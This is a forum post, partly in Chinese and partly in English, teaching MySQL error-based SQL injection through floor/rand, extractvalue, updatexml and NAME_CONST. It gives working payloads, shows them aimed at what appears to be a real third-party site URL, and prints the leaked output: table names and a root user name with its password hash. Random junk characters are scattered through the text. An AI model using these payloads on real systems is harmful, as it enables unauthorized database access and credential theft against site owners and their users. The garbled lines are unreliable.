|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:: ?' Z0 y! p' i8 Q+ P/ ?
首先进行正常查询: mysql> select * from article where id = 1;
3 d1 A" p) F# s% g& N V1 R+—-+——-+———+* a" s% E8 t# K. k+ a1 S/ c
| id | title | content |
# n0 x4 ` F7 S4 ~* F+ i0 @6 w+—-+——-+———+8 p: E) e- @; o
| 1 | test | do it |( Y) j" q0 D5 M; G7 ?
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);, b% N% B' u1 h( C2 N/ ?
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
# ?: j2 y9 @( f9 D例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
$ C2 E; l& P: K3 ?- U9 S0 l# PERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));2 U; E; q; F# P' t, I: q
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue' [! Q `* v4 C
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–5 r' M, A# \/ q; g+ ]: ^
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ & f9 _' z# S( l
) e4 q& u T6 ^$ G- A' L
再收集:
% V* ~: S) H! z& a$ whttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
7 Z+ M1 D8 Q. m/ u! t$ }5 _2 Y- a3 F7 M7 p6 |" v m
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’5 R! R7 z9 l) C
% ~1 ?: ~4 b0 v0 i" X
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)0 w! v! ~1 d, Q+ \; K
7 R( q1 _ @0 d, C F! L% K+ t4 K6 T
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 2 d, a7 E5 s8 ]5 t2 K
( a+ \# J6 _+ o1 Q: h1 a: g8 wMYSQL高版本报错注入技巧-利用NAME_CONST注入
2 r" j6 W: }: V5 r4 y3 ]. G wIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 9 D# D" W( t1 R$ v& n
A( y, s9 L" P7 E0 I# t
1 q8 ]4 S& I9 b4 A: C相关信息
: P# R5 N9 ]% e6 J. c$ _# H
8 k. Q2 M8 x) @, d$ g0 s! }NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
5 G+ L5 J( v) u# y& Z- G. B
4 C- |8 s) r8 k8 W0 P% JCode:
1 ?8 j) n2 o. i( W8 V2 W, X6 j7 qNAME_CONST(DATA, VALUE)6 ` r/ x' t% }2 `
9 M! Y' r7 q* s4 c1 X8 zReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
) A3 D# R9 r5 }8 d* e
, |; O/ c, |7 Q8 n3 Z( x! ^; ASELECT NAME_CONST('TEST', 1)) j/ q9 }, J, B- `% O
. O! W& k/ j0 l, W" y
# n Y0 ?7 ]" K9 [ U/ @2 e/ c6 f( N \7 y9 P# W6 i
|---------------|
0 t5 j& J) f5 }7 f| TEST |( F" P) A* A6 j9 A, N+ k) ` W
| |
' {- a, ^# c# Y+ m) b, u|---------------|
9 k4 M( z7 z% B8 ^| 1 |
5 O/ W9 b) |3 W; W) E$ X| |) ^( ^5 B/ l0 f' W ]( D' P
|---------------|, X& ^9 W# D- N A+ a- [; l: u' d
& }. C+ ~+ U! d0 d. F( V+ Y" r% C( M, X
& ?. }/ e7 A% a" i
! i/ t. R& t" q3 K4 b9 Y+ k& \/ p4 [http://dev.mysql.com/doc/refman/5.0/en/m...name-const
8 y$ b4 Y7 I' N/ eIntro to MySQL Variables
& {- W/ }6 O$ ?: T, s
$ [" p* o0 x- M8 k& k0 _Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
7 @5 S( E5 F) I1 S+ Q9 |
& f4 u! _: D4 z' C$ O! u9 Z: PCode:( ^' O- e! Z( F- ^, l
http://www.baido.hk/qcwh/content ... ;sid=19&cid=2616 a9 N5 w7 [0 E% p0 ~
0 e- n" H8 _: ?: P, V
+ W7 q, E0 {& a" V
' h/ n* [, G' M& p. W0 \9 D2 _" Y: u; _4 E8 o. L
1 K- K+ y* _- ~/ c7 {Code:! P" a3 W F ?! a* O$ A$ l
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
6 ?1 K, B$ [8 \' a( O
2 m# U4 k1 G# C8 [$ r: X2 M5 v! i4 B' P1 y r
VAR = Your MySQL variable. B) y |2 ~- Z3 s9 _. @6 v
% ?. N/ `% @( T5 v) A$ R) M5 O1 gMySQL 5.1.3 Server System Variables
1 ^- N+ R, c2 u E! n( W* U0 G; \/ z/ c& p; N' D
Let's try it out on my site..
4 \( L. ^7 l$ g9 w. W8 G9 Z' e2 _6 m. R) R. N
Code:% N1 q& V) o6 o) y/ P9 t
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
5 y" y& n, I2 p T3 \$ [/ ]6 ~
8 a5 B, t0 I8 {& r" BErroruplicate column name '5.0.27-community-nt'* G1 U/ M) O' |. R5 S% _
% t* S; w' q8 G- P5 ^
3 x; {1 x9 c; X' r! Q j, c* K& x# R7 V8 W2 A0 c
* M" e, `- n1 ?# o6 U
+ F. n8 ^: V7 K1 m2 T- CNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...0 p& I8 K- Y3 i' S$ F* q
1 a; d& ~7 _% u
Data Extraction
+ [3 |( J; x7 w1 A t
: m8 X4 R Y5 g# o* W5 \Code:
q, p! J# z- s6 x+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
/ O, w& H- T/ B% g) L, O% o2 \. F* [4 \9 g' t
# o. ~9 i2 n; o* G4 o1 @9 s/ xWe should get a duplicate column 1 error...! {6 i/ y/ k, [/ v4 y
0 G. o- E0 }4 T. Q+ A; K
Code:6 ?8 K2 X. o ]: |2 C2 i$ J- v
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--& \" J- R2 ], f
+ k0 c3 R K, T: j4 t; O
Erroruplicate column name '1
$ m, x4 W0 y; {: c! L5 h# J$ E$ p% K- G5 }$ h$ l/ g
6 d& B0 e, ~* \9 ]1 h; W/ @0 r) h
3 j7 Y1 z/ J7 d- X% m. O
5 ^4 g8 v% f# _
% v3 x8 U: R- ~ A' H1 z: Q
' t- m8 k) i% Y. A- U! lNow let's get the tables out this bitch..$ p5 M' L1 c$ P+ x/ S, U
; @& f% \! [/ tCode:4 P0 K' ~4 z3 s& [6 H. s: t! ^: g8 w
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--& N; h! h& T: x6 D( | s
" a% r9 o+ G0 x3 E! j* b
0 I$ x8 m4 W. a1 w; LLet's see if it works here, if it does, we can go on and finish the job.# x% b" A% G% L
5 z) N( \( F% J' k
Code:, x1 q; A2 ~4 q$ k9 @
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--6 p. ^0 u( \7 l# h& i7 E. `$ |8 S
* y/ Z: X y0 S. {3 \# |1 j4 p. H H6 ~, T9 M& s Z
Erroruplicate column name 'com_admanage
7 @2 ?% `; h4 R( t) r
- r5 q; |" i% R9 J& O
- A f% H$ t/ ~6 O& H! W3 U$ I' v5 v2 F: n G1 n% u, ^4 P
8 {0 |# X# _( g8 p& `5 f+ V
d! X/ D+ W3 r4 m
1 ^( h. F) ^. U4 lNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.$ z& x4 F% `0 P, l, B
# z4 W% C& F; h5 g R+ U" d- eLet's get the columns out of the user table..
5 i- }$ J5 Y0 D; K' j- p: B
! w! L" A) ?& N) ^6 ]' N7 o% MCode:. R, J* S- Q; [* ~5 v+ o- V
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--! w8 e$ i9 q2 c1 C9 x3 {) Z
" Y" S& e- \/ Y
g5 L9 ^; i$ H1 T
So mine looks like this, and I get the duplicate column name 'Host'.
7 i' U/ o. f# p( o8 l
' I: r1 t6 w" ~4 x+ K# X XCode:, r( s, }+ V& u( s6 A) f W+ r: Y6 e
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
% g; f. K$ ~3 z3 b8 R6 y4 h j! d( i" F& J& \
Erroruplicate column name 'Host'
. L, Z# C h' b, q1 R( X! {2 b: c5 c [- s$ k' d. B
* r2 n; J# w4 s
* n& [1 |6 l! L5 K ]) x
% s2 w- t& p1 K2 W3 q8 [8 U3 |" P3 ?1 F9 ?0 u0 n# `
: l. |' A: o2 E% Q
Woot, time to finish this bitch off.* E' l% ~ Y* Z( E: s% [ a+ ]
8 g7 O4 K4 W0 {3 g# sCode:
" y$ c$ B6 W( ?# }7 G1 a4 D0 a+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
2 X% `- n6 B# b/ {, U- H7 k$ I. J0 i% n3 ^
9 @% d: V! r2 l- u
So mine looks like this...
- i# _/ n8 n$ a
% `1 ] @9 O5 R n% B0 Z, x6 CCode:
0 R# L+ S7 w$ @9 I/ z" fhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
0 c; Q4 A& I' \" c: L7 I& |
# c% d( D% K# b! K# d, nErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
* |9 x! a# ^! t$ Y& {
$ U( g, I' f! N0 h% C0 e3 q$ X8 v% h
: S) }% K, K7 a# j4 M, M# `$ H, o w6 B& c8 H' X( L
7 u1 E1 T5 k8 c7 ]9 C+ i' \. J
' L8 r D4 s/ ?2 {1 JAnd there we have it, thanks for reading.
* J, X# M' X" z( ]( Y5 g j6 V# Z3 r/ w
|
发表于 2015-11-11 19:03:37
收藏
支持
反对